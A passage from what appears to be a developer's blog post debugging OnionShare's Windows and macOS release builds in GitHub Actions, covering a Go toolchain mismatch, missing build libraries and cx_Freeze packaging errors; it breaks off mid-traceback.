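<p>The cache key is just the runner OS plus a hash of <code>desktop/poetry.lock</code>, so the cached virtualenv is reused only while the dependency set stays identical. A rough sketch of the idea (a hypothetical helper, not what GitHub runs internally):</p>

```python
import hashlib

def poetry_cache_key(runner_os: str, lockfile_bytes: bytes) -> str:
    # Embed a hash of the lock file in the cache key: any change to the
    # locked dependencies produces a new key, which forces a cache miss
    # and a fresh install.
    digest = hashlib.sha256(lockfile_bytes).hexdigest()
    return f"{runner_os}-win64-poetry-{digest}"
```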
<p>This is the step that it's failing on:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build snowflake</span>
<span class="w"> </span><span class="nt">shell</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pwsh</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">if ((Test-Path -Path 'desktop\onionshare\resources\tor\snowflake-client.exe') -eq $True) {</span>
<span class="w"> </span><span class="no">Write-Output "snowflake already built"</span>
<span class="w"> </span><span class="no">} else {</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">.\scripts\build-pt-snowflake.ps1</span>
<span class="w"> </span><span class="no">}</span>
</pre></div>
<p>This is a small PowerShell script. It basically checks to see if <code>snowflake-client.exe</code> already exists (if it was cached from a previous job) and if so outputs a message that it's already built. Otherwise, it runs the <code>scripts/build-pt-snowflake.ps1</code> PowerShell script to compile it.</p>
<p>Here's the content of the <code>build-pt-snowflake.ps1</code> script:</p>
<div class="hll"><pre><span></span><span class="nv">$env:SNOWFLAKE_TAG</span> <span class="p">=</span> <span class="s1">'v2.6.0'</span>
<span class="nb">New-Item</span> <span class="n">-ItemType</span> <span class="n">Directory</span> <span class="n">-Force</span> <span class="n">-Path</span> <span class="p">.\</span><span class="n">build</span><span class="p">\</span><span class="n">snowflake</span>
<span class="nb">cd </span><span class="p">.\</span><span class="n">build</span><span class="p">\</span><span class="n">snowflake</span>
<span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">://</span><span class="n">git</span><span class="p">.</span><span class="n">torproject</span><span class="p">.</span><span class="n">org</span><span class="p">/</span><span class="n">pluggable-transports</span><span class="p">/</span><span class="n">snowflake</span><span class="p">.</span><span class="n">git</span>
<span class="nb">cd </span><span class="n">snowflake</span>
<span class="n">git</span> <span class="n">checkout</span> <span class="nv">$SNOWFLAKE_TAG</span>
<span class="n">go</span> <span class="n">build</span> <span class="p">.\</span><span class="n">client</span>
<span class="nb">Move-Item</span> <span class="n">-Path</span> <span class="p">.\</span><span class="n">client</span><span class="p">.</span><span class="n">exe</span> <span class="n">-Destination</span> <span class="p">..\..\..\</span><span class="n">onionshare</span><span class="p">\</span><span class="n">resources</span><span class="p">\</span><span class="n">tor</span><span class="p">\</span><span class="n">snowflake-client</span><span class="p">.</span><span class="n">exe</span>
</pre></div>
<p>This creates a folder, clones the Snowflake source code into it, checks out the tag for the version we want to build, compiles it with Go, and then moves the binary.</p>
<p>And here's the error message from this step:</p>
<pre><code> Directory: D:\a\onionshare\onionshare\desktop\build
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 9/28/2023 1:45 AM snowflake
Cloning into 'snowflake'...
warning: redirecting to https://gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/snowflake.git/
Your branch is up to date with 'origin/main'.
go: errors parsing go.mod:
D:\a\onionshare\onionshare\desktop\build\snowflake\snowflake\go.mod:5: unknown directive: toolchain
Move-Item: D:\a\onionshare\onionshare\desktop\scripts\build-pt-snowflake.ps1:9
Line |
9 | Move-Item -Path .\client.exe -Destination ..\..\..\onionshare\resourc …
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Cannot find path 'D:\a\onionshare\onionshare\desktop\build\snowflake\snowflake\client.exe' because it does not
| exist.
Error: Process completed with exit code 1.
</code></pre>
<p>It looks like there was an error trying to compile Snowflake, and so moving the binary failed because the binary was never created.</p>
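<p>The underlying issue is that the build script keeps going after <code>go build</code> fails, so the first visible error is the later <code>Move-Item</code>. A fail-fast wrapper (a sketch, not part of the OnionShare scripts) would surface the real failure immediately:</p>

```python
import subprocess
import sys

def run_or_die(cmd: list) -> None:
    # Stop immediately when a build command fails, instead of letting a
    # later step (like moving a binary that was never created) report a
    # confusing "file not found" error.
    result = subprocess.run(cmd)
    if result.returncode != 0:
        sys.exit(result.returncode)
```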
<p>I don't currently have a Windows VM for OnionShare development, so I'm going to create a new one and see if I can reproduce this issue.</p>
<h3 id="setting-up-windows-for-onionshare-development">Setting up Windows for OnionShare development</h3><p>I downloaded the <a href="https://www.microsoft.com/software-download/windows11">Windows 11 ISO from Microsoft</a>. In case you don't know, Microsoft lets you download ISOs for Windows which you can then install in VMs or on computers, for free. When you're installing it, you can just say you don't have a license key, and it lets you continue. You can use Windows as much as you want without paying for it, but certain features are disabled, such as the ability to change your desktop wallpaper. For the purposes of software development, you don't need any of those features.</p>
<p>I installed <a href="https://www.virtualbox.org/">VirtualBox</a>, created a new Windows 11 VM, and booted to it, installing Windows 11 Pro. After setting up an account, I installed all of the updates, so now I have an up-to-date Windows 11 box:</p>
<p><img src="win11-vm.png" alt="Windows 11 VM"></p>
<p>Then, I follow the instructions in <a href="https://github.com/onionshare/onionshare/blob/main/desktop/README.md"><code>desktop/README.md</code></a> to set up the development environment, specifically following the Windows instructions. This includes:</p>
<ul>
<li>Installing <a href="https://git-scm.com/download/win">Git for Windows</a>.</li>
<li>Cloning the OnionShare git repo, and checking out the <code>release-2.6.1</code> branch.</li>
<li>Installing <a href="https://www.python.org/downloads/windows/">Python for Windows</a>.</li>
<li>Installing Poetry and the Poetry dependencies. In PowerShell:<div class="hll"><pre><span></span><span class="n">pip</span> <span class="n">install</span> <span class="n">poetry</span>
<span class="nb">cd </span><span class="n">code</span><span class="p">\</span><span class="n">onionshare</span><span class="p">\</span><span class="n">desktop</span>
<span class="n">poetry</span> <span class="n">install</span>
</pre></div>
</li>
<li>Installing <a href="https://visualstudio.microsoft.com/visual-cpp-build-tools/">Microsoft C++ Build Tools</a>, specifically "Desktop development with C++".</li>
<li>Installing 7-Zip and gpg4win, and also adding both of these to the path so I can run them from PowerShell.</li>
<li>Running the <code>get-tor.py</code> script to download Tor Browser and extract the binaries:<div class="hll"><pre><span></span><span class="nb">cd </span><span class="n">code</span><span class="p">\</span><span class="n">onionshare</span><span class="p">\</span><span class="n">desktop</span>
<span class="n">poetry</span> <span class="n">run</span> <span class="n">python</span> <span class="p">.\</span><span class="n">scripts</span><span class="p">\</span><span class="nb">get-tor</span><span class="p">.</span><span class="n">py</span> <span class="n">win64</span>
</pre></div>
</li>
<li>Installing <a href="https://golang.org/doc/install">Go</a>.</li>
</ul>
<p>The next step in the instructions is to run the PowerShell scripts that build obfs4proxy, snowflake, and meek. This is also the step where the GitHub Actions job failed. So, I'll start with obfs4proxy:</p>
<p><img src="win11-pt-build-error.png" alt="Error running PowerShell scripts"></p>
<p>When I tried running the obfs4proxy build script I got the following error:</p>
<pre><code>PS C:\Users\dev\code\onionshare\desktop> .\scripts\build-pt-obfs4proxy.ps1
.\scripts\build-pt-obfs4proxy.ps1 : File
C:\Users\dev\code\onionshare\desktop\scripts\build-pt-obfs4proxy.ps1 cannot be loaded because running
scripts is disabled on this system. For more information, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\scripts\build-pt-obfs4proxy.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
</code></pre>
<p>This is because, by default, Windows refuses to run PowerShell scripts. To fix this, I opened a PowerShell window as an administrator and ran <code>Set-ExecutionPolicy -ExecutionPolicy Bypass</code>:</p>
<pre><code>PS C:\Windows\system32> Get-ExecutionPolicy
Restricted
PS C:\Windows\system32> Set-ExecutionPolicy -ExecutionPolicy Bypass
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): Y
PS C:\Windows\system32>
</code></pre>
<p>Then, back in my original PowerShell window, I ran <code>.\scripts\build-pt-obfs4proxy.ps1</code> again, and this time it worked: it downloaded the obfs4proxy source, compiled it, and then moved the binary into the correct place in the OnionShare folder.</p>
<p>Now, let's try building snowflake, which is the one that failed in GitHub Actions. I ran <code>.\scripts\build-pt-snowflake.ps1</code>... and it worked fine. Okay, I'll still have to figure out what's going on in GitHub Actions. In the meantime, I also ran <code>.\scripts\build-pt-meek.ps1</code> to build meek, and that worked too.</p>
<p>And that's it, the development environment is set up. I tried running OnionShare with <code>poetry run onionshare -v</code>, and it worked!</p>
<p><img src="win11-onionshare.png" alt="OnionShare in Windows"></p>
<p>Right now this is just running OnionShare from the Python source tree--there's another step involved for turning it into a <code>.exe</code> executable and building the installer. But before doing that, I need to figure out how to fix the GitHub Actions job.</p>
<h3 id="debugging-windows-build-in-github-actions-some-more">Debugging Windows build in GitHub Actions some more</h3><p>Taking a closer look at the error message from the GitHub Actions log, this is where it's failing to build snowflake:</p>
<pre><code> go: errors parsing go.mod:
D:\a\onionshare\onionshare\desktop\build\snowflake\snowflake\go.mod:5: unknown directive: toolchain
</code></pre>
<p>Here's the top of <code>desktop\build\snowflake\snowflake\go.mod</code>:</p>
<div class="hll"><pre><span></span><span class="nx">module</span><span class="w"> </span><span class="nx">gitlab</span><span class="p">.</span><span class="nx">torproject</span><span class="p">.</span><span class="nx">org</span><span class="o">/</span><span class="nx">tpo</span><span class="o">/</span><span class="nx">anti</span><span class="o">-</span><span class="nx">censorship</span><span class="o">/</span><span class="nx">pluggable</span><span class="o">-</span><span class="nx">transports</span><span class="o">/</span><span class="nx">snowflake</span><span class="o">/</span><span class="nx">v2</span>
<span class="k">go</span><span class="w"> </span><span class="mf">1.21</span>
<span class="nx">toolchain</span><span class="w"> </span><span class="nx">go1</span><span class="mf">.21.1</span>
</pre></div>
<p>The <code>build-win64</code> job uses the <code>windows-latest</code> GitHub runner, which is <a href="https://github.com/actions/runner-images/blob/main/images/win/Windows2022-Readme.md">Windows Server 2022</a>. According to its documentation, it comes with Go 1.20.8 installed. My guess is that I can fix this by installing the latest version of Go in the workflow.</p>
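<p>The <code>toolchain</code> directive was only introduced in Go 1.21, which is why Go 1.20.8 rejects it as an unknown directive. A quick sketch (a hypothetical helper, not one of the build scripts) for pulling the pinned toolchain out of a <code>go.mod</code>:</p>

```python
def required_toolchain(go_mod_text: str):
    # Return the version from a "toolchain goX.Y.Z" line in a go.mod,
    # or None if the file doesn't pin one.
    for line in go_mod_text.splitlines():
        parts = line.split()
        if len(parts) == 2 and parts[0] == "toolchain":
            return parts[1]
    return None
```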
<p>I did this by adding the following step to <code>.github/workflows/build.yml</code>:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install Go >=1.21.1</span>
<span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/setup-go@v4</span>
<span class="w"> </span><span class="nt">with</span><span class="p">:</span>
<span class="w"> </span><span class="nt">go-version</span><span class="p">:</span><span class="w"> </span><span class="s">'>=1.21.1'</span>
<span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">go version</span>
</pre></div>
<p>I committed my code, pushed it to the <code>release-2.6.1</code> branch, and GitHub Actions re-ran. This time, the <code>build-win64</code> job finished! (The <code>build-mac-intel</code> job failed, but I'll work on that in a minute.)</p>
<p><img src="github-actions-3.png" alt="build-win64 finished in Github Actions"></p>
<h3 id="testing-the-windows-binary-from-github-actions">Testing the Windows binary from GitHub Actions</h3><p>This workflow also generated some artifacts, including a <code>win64-build</code> one:</p>
<p><img src="github-actions-4.png" alt="Artifacts generated by the Github Actions workflow"></p>
<p>I downloaded the artifact, <code>win64-build.zip</code>, and unzipped it. Inside is a file called <code>onionshare-win64.zip</code>, which I copied to my VM and unzipped there. Here's the folder with the OnionShare build:</p>
<p><img src="win11-ga-binary.png" alt="Explorer showing the OnionShare binary files"></p>
<p>I double-clicked on <code>onionshare.exe</code>, and it worked! An OnionShare window opened. I went ahead and connected to Tor, created an anonymous drop box, installed Tor Browser, and loaded my drop box to make sure it all worked.</p>
<p><img src="win11-ga-binary-onionshare.png" alt="Running OnionShare from the GitHub Actions-generated binary"></p>
<p>And for good measure, I also tested the CLI version of OnionShare in Windows:</p>
<p><img src="win11-ga-binary-onionshare-cli.png" alt="Running onionshare-cli.exe from the GitHub Actions-generated binary"></p>
<p>Great, Windows works! I'll still need to code sign and package it for distribution, but before I do that I want to create a signed git tag, and before I do <em>that</em> I want to make sure that the release is completely ready. I'll come back to Windows in a bit, but for now it's time to move on to macOS.</p>
<h2 id="building-onionshare-for-macos">Building OnionShare for macOS</h2><p>Just like the Windows release, the GitHub Actions workflow also builds a binary for macOS using the <code>build-mac-intel</code> job. At the moment this just builds the binary for Intel Macs. It can't yet make binaries for Apple Silicon Macs (M1 and M2 ARM64 processors).</p>
<p>I just looked it up, and according to GitHub's roadmap they'll be <a href="https://github.com/github/roadmap/issues/528">adding support for Apple Silicon</a> GitHub Action runners in Q4 of 2023. This means that for now I'll need to manually build the Apple Silicon binaries from my own Apple Silicon Mac, but I should be able to use the Intel binaries built by the workflow.</p>
<p>Anyway, back to the <code>build-mac-intel</code> job. Let's see why it was failing.</p>
<p><img src="github-actions-5.png" alt="The build-mac-intel job failing"></p>
<p>It failed on the "Build OnionShare" step, which is the final step before compressing the binary and saving it as a GitHub Actions artifact. There are 38,000 log messages, though, and it's not immediately clear exactly what caused it to fail.</p>
<p>I'm going to set up a macOS development environment for OnionShare and see if I can manually reproduce the problem.</p>
<h3 id="setting-up-macos-for-onionshare-development">Setting up macOS for OnionShare development</h3><p>I have an old early 2015 MacBook Pro (with an Intel processor) that I use as my dedicated macOS software release laptop. Just like for Windows, the instructions for setting up the macOS dev environment are in <code>desktop/README.md</code>.</p>
<p>I've already set up a dev environment on this computer in the past, but I'm going to update it for this release:</p>
<ul>
<li>I powered this computer on for the first time in many months and installed macOS updates. It runs macOS 12.7, the latest version that Apple still supports for this hardware. I also installed Homebrew updates.</li>
<li>This computer has Python 3.10.8 installed, so while I'm at it I updated it to the latest version, Python 3.11.5. Then I installed Poetry.</li>
<li>I switched to the <code>release-2.6.1</code> branch in my <code>onionshare</code> source tree.</li>
<li>I installed the latest dependencies with Poetry.</li>
<li>I got the latest Tor binaries by running:<pre><code>cd desktop
poetry run python ./scripts/get-tor.py macos
</code></pre>
</li>
<li>I upgraded the version of Go I had installed, and then built all of the pluggable transports by running:<pre><code>./scripts/build-pt-obfs4proxy.sh
./scripts/build-pt-snowflake.sh
./scripts/build-pt-meek.sh
</code></pre>
</li>
</ul>
<p>And that's it, the development environment is set up. I tried running OnionShare with <code>poetry run onionshare -v</code>, and it worked!</p>
<p><img src="macos-onionshare.png" alt="OnionShare in macOS"></p>
<h3 id="building-the-macos-app-bundle">Building the macOS app bundle</h3><p>The GitHub Actions job failed on the "Build OnionShare" step, which is defined as this:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py build</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>Or more simply:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>build
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>bdist_mac
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/build-macos.py<span class="w"> </span>cleanup-build
</pre></div>
<p>The Windows and Mac versions of OnionShare use software called <a href="https://marcelotduarte.github.io/cx_Freeze/">cx_Freeze</a> to "freeze" the Python code into executable binaries, <code>.exe</code> files in Windows and Mach-O files in macOS. The <code>build</code> step freezes the Python into binaries and the <code>bdist_mac</code> step creates a macOS app bundle (a <code>.app</code> folder, the kind that you drag into Applications). And the last <code>./scripts/build-macos.py cleanup-build</code> script deletes a bunch of unused stuff from the app bundle, making the final file size much smaller.</p>
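<p>The cleanup step is conceptually simple: walk the frozen app bundle and delete things the app never loads. A sketch of that idea (hypothetical paths and list; the real one lives in <code>build-macos.py</code>):</p>

```python
import shutil
from pathlib import Path

def cleanup_bundle(bundle: Path, unused: list) -> int:
    # Delete unused files and directories from the frozen bundle to
    # shrink the final .app; returns how many entries were removed.
    removed = 0
    for rel in unused:
        target = bundle / rel
        if target.is_dir():
            shutil.rmtree(target)
            removed += 1
        elif target.exists():
            target.unlink()
            removed += 1
    return removed
```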
<p>I will try to manually run each of these steps on my old Mac and see if I can reproduce the problem:</p>
<pre><code>% poetry run python ./setup-freeze.py build
running build
running build_py
creating build/lib
creating build/lib/onionshare
copying onionshare/tor_settings_tab.py -> build/lib/onionshare
--snip--
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/Qt/plugins/sqldrivers/libqsqlodbc.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/PySide6/Qt/plugins/sqldrivers/libqsqlodbc.dylib
copying /usr/local/opt/libiodbc/lib/libiodbc.2.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/libiodbc.2.dylib
error: [Errno 2] No such file or directory: '/usr/local/opt/libiodbc/lib/libiodbc.2.dylib'
</code></pre>
<p>Aha, an error! It's trying to copy <code>/usr/local/opt/libiodbc/lib/libiodbc.2.dylib</code> into the build folder but failing because that file doesn't exist. Maybe I can just install it and then try again?</p>
<p>I ran <code>brew search libiodbc</code> and found that there's a package with that name, so I tried installing it:</p>
<div class="hll"><pre><span></span>brew<span class="w"> </span>install<span class="w"> </span>libiodbc
</pre></div>
<p>After installing it, I confirmed that the file <code>/usr/local/opt/libiodbc/lib/libiodbc.2.dylib</code> exists. So, I ran the build script again:</p>
<pre><code>% poetry run python ./setup-freeze.py build
running build
--snip--
copying /Applications/Postgres.app/Contents/Versions/14/lib/libpq.5.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/libpq.5.dylib
error: [Errno 2] No such file or directory: '/Applications/Postgres.app/Contents/Versions/14/lib/libpq.5.dylib'
</code></pre>
<p>Another missing dependency. Ahh, and this must be why I added this step to the <code>build-macos-intel</code> job:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install cx_Freeze/PySide6 build dependencies</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">brew install libiodbc</span>
<span class="w"> </span><span class="no">cd ~/Downloads</span>
<span class="w"> </span><span class="no">curl -O -L https://github.com/PostgresApp/PostgresApp/releases/download/v2.5.12/Postgres-2.5.12-14.dmg</span>
<span class="w"> </span><span class="no">hdiutil attach Postgres-2.5.12-14.dmg</span>
<span class="w"> </span><span class="no">cp -r /Volumes/Postgres-2.5.12-14/Postgres.app /Applications/</span>
<span class="w"> </span><span class="no">hdiutil detach /Volumes/Postgres-2.5.12-14</span>
</pre></div>
<p>It looks like I need to install the Postgres app, which PySide6 pulls a library out of. And hey, now that I look at it, that step also includes <code>brew install libiodbc</code> already--this must not be the first time I've debugged this specific issue.</p>
<p>Looking at <a href="https://github.com/PostgresApp/PostgresApp/releases">https://github.com/PostgresApp/PostgresApp/releases</a> I see that the latest version of the Postgres app, using Postgres 14, is 2.6.5. So I went ahead and updated that:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install cx_Freeze/PySide6 build dependencies</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">brew install libiodbc</span>
<span class="w"> </span><span class="no">cd ~/Downloads</span>
<span class="w"> </span><span class="no">curl -O -L https://github.com/PostgresApp/PostgresApp/releases/download/v2.6.5/Postgres-2.6.5-14.dmg</span>
<span class="w"> </span><span class="no">hdiutil attach Postgres-2.6.5-14.dmg</span>
<span class="w"> </span><span class="no">cp -r /Volumes/Postgres-2.6.5-14/Postgres.app /Applications/</span>
<span class="w"> </span><span class="no">hdiutil detach /Volumes/Postgres-2.6.5-14</span>
</pre></div>
<p>I installed this version of Postgres on my build machine, and ran the build script again. This time it succeeded!</p>
<p>So I moved on to the <code>bdist_mac</code> command, which should build the app bundle:</p>
<pre><code>% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
creating directory /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/bases/lib/Python -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/Python
--snip--
Resolved rpath:
/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6
/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/Qt/lib
Loaded libraries:
@rpath/libshiboken6.abi3.6.5.dylib -> None
@rpath/QtCore.framework/Versions/A/QtCore -> /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/Qt/lib/QtCore.framework/Versions/A/QtCore
/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
/System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration -> /System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration
/usr/lib/libc++.1.dylib -> /usr/lib/libc++.1.dylib
/usr/lib/libSystem.B.dylib -> /usr/lib/libSystem.B.dylib
error: [Errno 2] No such file or directory: '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/libpyside6.abi3.6.5.dylib'
</code></pre>
<p>Ok, another error message. This time it's complaining that a library in the app bundle, <code>OnionShare.app/Contents/MacOS/libpyside6.abi3.6.5.dylib</code>, doesn't exist. I checked to see if that file exists anywhere in the app bundle, and in fact it does, in three different places:</p>
<pre><code>% find build/OnionShare.app | grep libpyside6.abi3.6.5.dylib
build/OnionShare.app/Contents/Resources/lib/PySide6/libpyside6.abi3.6.5.dylib
build/OnionShare.app/Contents/Resources/lib/libpyside6.abi3.6.5.dylib
build/OnionShare.app/Contents/Resources/libpyside6.abi3.6.5.dylib
</code></pre>
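The same `find | grep` check can be done from Python, which is handy when poking at the bundle from a debugging script — a throwaway sketch using `pathlib`:

```python
from pathlib import Path

def find_in_bundle(bundle, name):
    """Return every path under `bundle` whose filename matches `name`,
    like `find bundle | grep name` but matching only the basename."""
    return sorted(str(p) for p in Path(bundle).rglob(name))

# e.g. find_in_bundle("build/OnionShare.app", "libpyside6.abi3.6.5.dylib")
```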
<p>🎵 Debugging noises... 🎵</p>
<p>Ok I have a lead. The <code>setup-freeze.py</code> file is a <a href="https://cx-freeze.readthedocs.io/en/stable/setup_script.html">cx_Freeze setup script</a>, and looking in it I have various platform-specific modifications depending on which platform I'm trying to freeze:</p>
<div class="hll"><pre><span></span><span class="k">if</span> <span class="n">platform</span><span class="o">.</span><span class="n">system</span><span class="p">()</span> <span class="o">==</span> <span class="s2">"Windows"</span><span class="p">:</span>
<span class="n">include_msvcr</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">gui_base</span> <span class="o">=</span> <span class="s2">"Win32GUI"</span>
<span class="c1"># gui_base = None</span>
<span class="n">exec_icon</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="s2">"onionshare"</span><span class="p">,</span> <span class="s2">"resources"</span><span class="p">,</span> <span class="s2">"onionshare.ico"</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">platform</span><span class="o">.</span><span class="n">system</span><span class="p">()</span> <span class="o">==</span> <span class="s2">"Darwin"</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">PySide6</span>
<span class="kn">import</span> <span class="nn">shiboken6</span>
<span class="n">include_msvcr</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">gui_base</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">exec_icon</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">include_files</span> <span class="o">+=</span> <span class="p">[</span>
<span class="p">(</span>
<span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">PySide6</span><span class="o">.</span><span class="n">__path__</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">"libpyside6.abi3.6.5.dylib"</span><span class="p">),</span>
<span class="s2">"libpyside6.abi3.6.5.dylib"</span><span class="p">,</span>
<span class="p">),</span>
<span class="p">(</span>
<span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">shiboken6</span><span class="o">.</span><span class="n">__path__</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">"libshiboken6.abi3.6.5.dylib"</span><span class="p">),</span>
<span class="s2">"libshiboken6.abi3.6.5.dylib"</span><span class="p">,</span>
<span class="p">),</span>
<span class="p">]</span>
</pre></div>
<p>When <code>platform.system() == "Darwin"</code> (i.e. when this script is being run on macOS), it adds some extra files to be included. I can't remember why I originally added this hack (it was probably required to get the build to succeed at the time) but I'm going to try just deleting it and see if that helps. I've updated the macOS-specific code to just be:</p>
<div class="hll"><pre><span></span><span class="k">elif</span> <span class="n">platform</span><span class="o">.</span><span class="n">system</span><span class="p">()</span> <span class="o">==</span> <span class="s2">"Darwin"</span><span class="p">:</span>
<span class="n">include_msvcr</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">gui_base</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">exec_icon</span> <span class="o">=</span> <span class="kc">None</span>
</pre></div>
<p>And then I'm running the <code>bdist_mac</code> command again... and it finished without any errors!</p>
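Note that the deleted hack hardcoded the library version (<code>6.5</code>) into the filenames — and the cleanup output later in this post still references <code>6.4</code> filenames, which is exactly how version pins like this rot. If those extra <code>include_files</code> ever turn out to be needed again, the version could be discovered with a glob instead — a sketch, not the actual setup script:

```python
import glob
import os

def find_versioned_lib(directory, stem):
    """Find a library like `libpyside6.abi3.<version>.dylib` without
    hardcoding the version number. Returns the first match or None."""
    matches = sorted(glob.glob(os.path.join(directory, f"{stem}.abi3.*.dylib")))
    return matches[0] if matches else None

# Usage (hypothetical): find_versioned_lib(PySide6.__path__[0], "libpyside6")
```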
<p>Now I'll run the last command:</p>
<pre><code>% poetry run python ./scripts/build-macos.py cleanup-build
> Delete unused Qt Frameworks
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtMultimediaQuick.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtQuickControls2.framework
--snip--
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtWebEngineQuick.pyi
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtWebEngineQuickDelegatesQml.framework
> Move files around so Apple will notarize
Traceback (most recent call last):
File "/Users/user/code/onionshare/desktop/./scripts/build-macos.py", line 364, in <module>
main()
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1157, in __call__
return self.main(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1078, in main
rv = self.invoke(ctx)
^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1688, in invoke
return _process_result(sub_ctx.command.invoke(sub_ctx))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
